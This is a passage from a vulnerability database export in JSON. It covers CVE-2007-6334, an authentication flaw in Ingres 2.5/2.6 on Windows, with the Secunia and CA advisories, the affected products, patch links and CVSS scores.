"date": "2017-08-29T00:00:00",
"db": "VULHUB",
"id": "VHN-51248"
},
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2011-3303"
},
{
"date": "2011-10-05T00:00:00",
"db": "BID",
"id": "49951"
},
{
"date": "2011-11-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"date": "2011-10-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201110-060"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-3303"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201110-060"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco Multiple Devices ASA Service Module ILS Communication Resource Management Error Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-060"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201110-060"
}
],
"trust": 0.6
}
}
VAR-200712-0115
Vulnerability from variot - Updated: 2025-04-10 23:15Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges. Ingres is prone to an unauthorized-access security vulnerability because of a flaw in user authentication. Attackers can exploit this issue to gain unauthorized access to the affected database. Successful exploits can allow attackers to access, create, or modify data; other attacks are possible. This issue affects Ingres 2.5 and 2.6 when running on Windows. NOTE: This issue does not affect the Ingres .NET data provider.
A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched.
Download and test it today: https://psi.secunia.com/
Read more about this new version: https://psi.secunia.com/?page=changelog
TITLE: Ingres User Authentication Security Issue
SECUNIA ADVISORY ID: SA28187
VERIFY ADVISORY: http://secunia.com/advisories/28187/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
SOFTWARE: Ingres 2.x http://secunia.com/product/14576/
DESCRIPTION: A security issue has been reported in Ingres, which potentially can be exploited by malicious users to bypass certain security restrictions. and 2.6 on Windows.
SOLUTION: Apply fixes (requires login): http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415703+HTMPL=kt_document_view.htmpl
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: Ingres: http://www.ingres.com/support/security-alertDec17.php
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Title: [CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability
CA Vuln ID (CAID): 35970
CA Advisory Date: 2007-12-19
Reported By: Ingres Corporation
Impact: Attacker can gain elevated privileges.
Summary: A potential vulnerability exists in the Ingres software that is embedded in various CA products. This vulnerability exists only on Ingres 2.5 and Ingres 2.6 on Windows, and does not manifest itself on any Unix platform. Ingres r3 and Ingres 2006 are not affected. In all reported instances, the application (typically an ASP.NET application using the Ingres ODBC driver) was running on Microsoft IIS Web server, and with the Integrated Windows Authentication (IWA) option enabled. While IWA is not enabled by default, it is a commonly used option.
Mitigating Factors: The vulnerability exists only on Windows systems running Microsoft IIS Web server that have the Integrated Windows Authentication (IWA) option enabled.
Severity: CA has given this vulnerability a High risk rating.
Affected Products: All CA products that embed Ingres 2.5 and Ingres 2.6, and also run Microsoft IIS Web server with the Integrated Windows Authentication (IWA) option enabled.
Affected Platforms: Windows
Status and Recommendation (URLs may wrap): Ingres has issued the following patches to address the vulnerabilities. Ingres 2.6 Single-Byte patch - Ingres 2.6 Single-Byte patch ftp://ftp.ca.com/caproducts/ips/MDB/Generic_Ingres/IIS_Vulnerability/patch-2.6.0701.12467-win-x86.zip Ingres 2.6 Double-Byte patch- Ingres 2.6 Double-Byte patch ftp://ftp.ca.com/caproducts/ips/MDB/Generic_Ingres/IIS_Vulnerability/patch-2.6.0701.12473-win-x86-DBL.zip Ingres 2.5 Single Byte Patch- Ingres 2.5 Single Byte patch ftp://ftp.ca.com/caproducts/ips/MDB/Generic_Ingres/IIS_Vulnerability/patch-2.5.0605.12291-win-x86.zip Potential problems installing the patches: While testing these patches, CA identified an install issue when the user is presented with the option to make a backup of the Ingres installation. In cases where a is in the path, the path is not properly read. The backup does get taken and is by default stored in the %II_SYSTEM%\ingres\install\backup directory. Additionally, if the user happens to press the "Set Directory" button, the path will be displayed. Clicking "ok" will result in a message stating "... spaces are not supported in paths... ". This also is an error; pressing cancel will return the user to the first screen with the default path, and while the displayed path is terminated at a space, the actual path does work. To avoid this issue, use DOS 8.3 definitions (ex. C:\progra~1\CA\ingres).
How to determine if you are affected: Check the %II_SYSTEM%\ingres\version.rel file to identify the Ingres version. If the installed version of Ingres 2.6 is a Double-Byte version (should have DBL referenced), please download the 2.6 Double-Byte patch. Otherwise, use the Single-Byte patch.
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ Important Security Notice for Customers Using Products that Embed Ingres on Microsoft Windows ONLY http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp Solution Document Reference APARs: N/A CA Security Response Blog posting: CA Products That Embed Ingres Authentication Vulnerability http://community.ca.com/blogs/casecurityresponseblog/archive/2007/12/19.aspx CA Vuln ID (CAID): 35970 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35970 Reported By: Ingres Corporation http://ingres.com/support/security.php http://ingres.com/support/security-alertDec17.php CVE References: CVE-2007-6334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6334 OSVDB References: 39358 http://osvdb.org/39358
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
Download and test it today: https://psi.secunia.com/
Read more about this new version: https://psi.secunia.com/?page=changelog
TITLE: CA Products Ingres User Authentication Security Issue
SECUNIA ADVISORY ID: SA28183
VERIFY ADVISORY: http://secunia.com/advisories/28183/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
SOFTWARE: BrightStor ARCserve Backup 11.x http://secunia.com/product/312/ BrightStor ARCserve Backup 9.x http://secunia.com/product/313/ BrightStor Enterprise Backup 10.x http://secunia.com/product/314/ BrightStor Storage Command Center 11.x http://secunia.com/product/14581/ BrightStor Storage Resource Manager 11.x http://secunia.com/product/5909/ CA Advantage Data Transformer 2.x http://secunia.com/product/5904/ CA AllFusion Enterprise Workbench 1.x http://secunia.com/product/14579/ CA AllFusion Enterprise Workbench 7.x http://secunia.com/product/14580/ CA AllFusion Harvest Change Manager 7.x http://secunia.com/product/5905/ CA ARCserve Backup for Laptops & Desktops 11.x http://secunia.com/product/5906/ CA CleverPath Aion 10.x http://secunia.com/product/5582/ CA CleverPath Predictive Analysis Server 3.x http://secunia.com/product/5581/ CA Embedded Entitlements Manager 8.x http://secunia.com/product/14582/ CA eTrust Admin 8.x http://secunia.com/product/5584/ CA eTrust Audit 8.x http://secunia.com/product/5912/ CA Network Forensics 8.x http://secunia.com/product/14585/ CA Unicenter Advanced Systems Management 11.x http://secunia.com/product/14587/ CA Unicenter Asset Intelligence 11.x http://secunia.com/product/14588/ CA Unicenter Asset Management 11.x http://secunia.com/product/14589/ CA Unicenter Asset Portfolio Management 11.x http://secunia.com/product/7125/ CA Unicenter Database Command Center 11.x http://secunia.com/product/12928/ CA Unicenter Desktop and Server Management 11.x http://secunia.com/product/14590/ CA Unicenter Desktop Management Suite 11.x http://secunia.com/product/14591/ CA Unicenter Enterprise Job Manager 1.x http://secunia.com/product/5588/ CA Unicenter Job Management Option 11.x http://secunia.com/product/14592/ CA Unicenter Lightweight Portal 2.x http://secunia.com/product/14593/ CA Unicenter Management Portal 3.x http://secunia.com/product/3936/ CA Unicenter Network and Systems Management (NSM) 11.x http://secunia.com/product/14437/ CA Unicenter Network and Systems Management (NSM) 3.x http://secunia.com/product/1683/ CA Unicenter Patch Management 11.x http://secunia.com/product/14595/ CA Unicenter Remote Control 11.x http://secunia.com/product/14596/ CA Unicenter Remote Control 6.x http://secunia.com/product/2622/ CA Unicenter Service Accounting 11.x http://secunia.com/product/7127/ CA Unicenter Service Assure 11.x http://secunia.com/product/7128/ CA Unicenter Service Assure 2.x http://secunia.com/product/14597/ CA Unicenter Service Catalog 11.x http://secunia.com/product/7129/ CA Unicenter Service Delivery 11.x http://secunia.com/product/14598/ CA Unicenter Service Intelligence 11.x http://secunia.com/product/14599/ CA Unicenter Service Metric Analysis 11.x http://secunia.com/product/7126/ CA Unicenter Service Metric Analysis 3.x http://secunia.com/product/14600/ CA Unicenter ServicePlus Service Desk 11.x http://secunia.com/product/14602/ CA Unicenter ServicePlus Service Desk 5.x http://secunia.com/product/14601/ CA Unicenter ServicePlus Service Desk 6.x http://secunia.com/product/1684/ CA Unicenter Software Delivery 11.x http://secunia.com/product/7120/ CA Unicenter TNG 2.x http://secunia.com/product/3206/ CA Unicenter Web Services Distributed Management 3.x http://secunia.com/product/12199/ CA Unicenter Workload Control Center 1.x http://secunia.com/product/12932/ CA Wily SOA Manager 7.x http://secunia.com/product/14603/ eTrust Directory 8.x http://secunia.com/product/7114/ eTrust IAM Suite 8.x http://secunia.com/product/14583/ eTrust Identity Manager 8.x http://secunia.com/product/14584/ eTrust Secure Content Manager (SCM) http://secunia.com/product/3391/ eTrust Single Sign-On 7.x http://secunia.com/product/10747/ eTrust Web Access Control 1.x http://secunia.com/product/14586/
DESCRIPTION: A vulnerability has been reported in CA products, which can be exploited by malicious users to bypass certain security restrictions.
SOLUTION: Apply patches (see the vendor's advisory for more information)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200712-0115",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ingres",
"scope": "eq",
"trust": 1.0,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "ingres",
"scope": "eq",
"trust": 1.0,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "ingres",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "2.5 and 2.6"
},
{
"model": "windows nt",
"scope": null,
"trust": 0.6,
"vendor": "microsoft",
"version": null
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter enterprise job manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup 11.5.sp3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter remote control sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates advantage plex for distributed systems",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor arcserve backup sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5.2"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1.1"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates web service distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.50"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup 11.5.sp1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.01"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates cleverpath aion",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates etrust audit sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates web service distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.5"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5.1"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates brightstor arcserve backup 11.5.sp2",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter service accounting",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter enterprise job manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1.2"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter workload control center sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1"
},
{
"model": "associates unicenter service accounting",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter enterprise job manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.1"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0.1"
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
}
],
"sources": [
{
"db": "BID",
"id": "26959"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"db": "CNNVD",
"id": "CNNVD-200712-299"
},
{
"db": "NVD",
"id": "CVE-2007-6334"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ingres:ingres",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Bill Maimone",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200712-299"
}
],
"trust": 0.6
},
"cve": "CVE-2007-6334",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2007-6334",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-6334",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2007-6334",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200712-299",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004712"
},
{
"db": "CNNVD",
"id": "CNNVD-200712-299"
},
{
"db": "NVD",
"id": "CVE-2007-6334"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges. Ingres is prone to an unauthorized-access security vulnerability because of a flaw in user authentication. \nAttackers can exploit this issue to gain unauthorized access to the affected database. Successful exploits can allow attackers to access, create, or modify data; other attacks are possible. \nThis issue affects Ingres 2.5 and 2.6 when running on Windows. \nNOTE: This issue does not affect the Ingres .NET data provider. \n\n----------------------------------------------------------------------\n\nA new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI\nhas been released. The new version includes many new and advanced\nfeatures, which makes it even easier to stay patched. \n\nDownload and test it today:\nhttps://psi.secunia.com/\n\nRead more about this new version:\nhttps://psi.secunia.com/?page=changelog\n\n----------------------------------------------------------------------\n\nTITLE:\nIngres User Authentication Security Issue\n\nSECUNIA ADVISORY ID:\nSA28187\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/28187/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nSOFTWARE:\nIngres 2.x\nhttp://secunia.com/product/14576/\n\nDESCRIPTION:\nA security issue has been reported in Ingres, which potentially can\nbe exploited by malicious users to bypass certain 